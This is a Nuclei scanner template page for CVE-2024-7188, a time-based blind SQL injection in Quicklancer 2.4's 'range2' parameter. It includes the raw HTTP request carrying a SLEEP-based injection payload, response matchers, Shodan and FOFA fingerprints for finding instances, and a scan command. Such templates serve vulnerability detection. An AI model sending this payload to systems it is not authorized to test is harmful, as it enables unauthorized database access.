Skip to content
Nuclei Templates

Bylancer Quicklancer 2.4 G - SQL Injection

ID: CVE-2024-7188

Severity: high

Author: s4e-io

Tags: time-based-sqli,cve,cve2024,sqli,quicklancer

Description

Section titled “Description”

A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter ‘range2’, that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database.

YAML Source

Section titled “YAML Source”
id: CVE-2024-7188


info:
  name: Bylancer Quicklancer 2.4 G - SQL Injection
  author: s4e-io
  severity: high
  description: |
    A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database.
  reference:
    - https://cvefeed.io/vuln/detail/CVE-2024-7188
    - https://github.com/bigb0x/CVEs/blob/main/quicklancer-2-4.md
    - https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7188
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-7188
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.16096
  metadata:
    verified: true
    max-request: 1
    vendor: bylancer
    product: quicklancer
    shodan-query: http.favicon.hash:1099370896
    fofa-query: icon_hash="1099370896"
  tags: time-based-sqli,cve,cve2024,sqli,quicklancer


http:
  - raw:
      - |
        @timeout 30s
        GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - 'contains(content_type,"text/html")'
          - 'contains_all(body,"og:site_name","og:locale","range2")'
        condition: and
# digest: 4a0a00473045022100c9f31e2bad27dd045c155d177916ffaef21e8de3ac7a3bad04cdb5dda3d6ec39022008884fc37d5bf895e1f9b50d56d6ef69d1ebc7a2f3dfa181b897872a9781ee63:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-7188.yaml"

View on Github